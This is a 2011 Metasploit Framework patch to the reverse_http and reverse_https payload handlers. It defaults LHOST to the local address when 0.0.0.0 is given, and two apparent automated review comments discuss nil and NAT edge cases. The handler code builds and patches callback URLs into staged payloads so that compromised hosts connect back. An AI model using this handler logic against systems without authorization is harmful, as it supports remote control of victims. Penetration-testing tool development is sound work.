From 616913c4c19a39304c6cf8eb9f06253d7a68a056 Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Fri, 23 Sep 2011 17:04:24 +0000
Subject: [PATCH] Handle situations where the user set LHOST to 0.0.0.0 in the handler by defaulting LHOST to our locally visible IP for the specific client. Solves some integration issues where 0.0.0.0 was accidentally used

git-svn-id: file:///home/svn/framework3/trunk@13782 4d416f70-5f16-0410-b530-b9f4589650da
---
 lib/msf/core/handler/reverse_http.rb | 14 +++++++++++---
 lib/msf/core/handler/reverse_https.rb | 11 +++++++++--
 2 files changed, 20 insertions(+), 5 deletions(-)

diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb
index 9f3c35db1e..0f099174e9 100644
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -123,13 +123,21 @@ protected
 print_status("#{cli.peerhost}:#{cli.peerport} Request received for #{req.relative_resource}...")
+
+ lhost = datastore['LHOST']
+
+ # Default to our own IP if the user specified 0.0.0.0 (pebkac avoidance)
+ if lhost.empty? or lhost == '0.0.0.0'
+ lhost = Rex::Socket.source_address(cli.peerhost)
+ end
+
 # Process the requested resource.
 case req.relative_resource
 when /^\/INITJM/
- print_line("java: #{req.relative_resource}")
+ print_line("Java: #{req.relative_resource}")
 conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
- url = "http://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00"
+ url = "http://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00"
 print_line "URL: #{url.inspect}"
 blob = ""
@@ -178,7 +186,7 @@ protected
 conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
 i = blob.index("https://" + ("X" * 256))
 if i
- url = "http://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00"
+ url = "http://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00"
 blob[i, url.length] = url
 end
 print_status("Patched URL at offset #{i}...")
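Review bot: The new guard `if lhost.empty? or lhost == '0.0.0.0'` raises NoMethodError when `datastore['LHOST']` is nil rather than an empty string, so a handler whose LHOST was never set fails inside the request callback instead of taking the intended fallback; `if lhost.to_s.empty? || lhost == '0.0.0.0'` covers nil as well and drops the low-precedence `or`. The identical check is added in the reverse_https.rb hunk at -124 and should be changed there too, and if this handler can also bind IPv6 the `::` wildcard presumably deserves the same treatment. `Rex::Socket.source_address(cli.peerhost)` returns the local interface address the routing table picks for that peer, so behind NAT the stage URL will carry an internal address the client cannot reach; a comment on the fallback such as `# NOTE: behind NAT this is the internal interface address, not the public one - set LHOST explicitly in that case` would make the limitation visible to operators. The enclosing method starts before this hunk, so whether LHOST is declared as a required option is not visible here.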
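Review bot: The replaced `url = "http://#{lhost}:..."` line in the -178 hunk depends on the `lhost` local assigned at the top of the -123 hunk, which only holds if this `if i` block lives in the same method; the `@@ protected` context shows neither method boundary, so if the two hunks are in different methods this line raises NameError for an undefined local. The same cross-hunk dependency exists between the two reverse_https.rb hunks (-124 and -176). If they are indeed one method, a comment on the assignment, `# lhost is reused by every branch of the case below`, would explain why it is computed before the dispatch rather than inside the INITJM branch. The enclosing method begins and ends outside this hunk.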
diff --git a/lib/msf/core/handler/reverse_https.rb b/lib/msf/core/handler/reverse_https.rb
index 605eb759d5..4bf1f20d6d 100644
--- a/lib/msf/core/handler/reverse_https.rb
+++ b/lib/msf/core/handler/reverse_https.rb
@@ -124,11 +124,18 @@ protected
 print_status("#{cli.peerhost}:#{cli.peerport} Request received for #{req.relative_resource}...")
+ lhost = datastore['LHOST']
+
+ # Default to our own IP if the user specified 0.0.0.0 (pebkac avoidance)
+ if lhost.empty? or lhost == '0.0.0.0'
+ lhost = Rex::Socket.source_address(cli.peerhost)
+ end
+
 # Process the requested resource.
 case req.relative_resource
 when /^\/INITJM/
 conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
- url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00"
+ url = "https://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00"
 #$stdout.puts "URL: #{url.inspect}"
 blob = ""
@@ -176,7 +183,7 @@ protected
 conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
 i = blob.index("https://" + ("X" * 256))
 if i
- url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00"
+ url = "https://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00"
 blob[i, url.length] = url
 end
 print_status("Patched URL at offset #{i}...")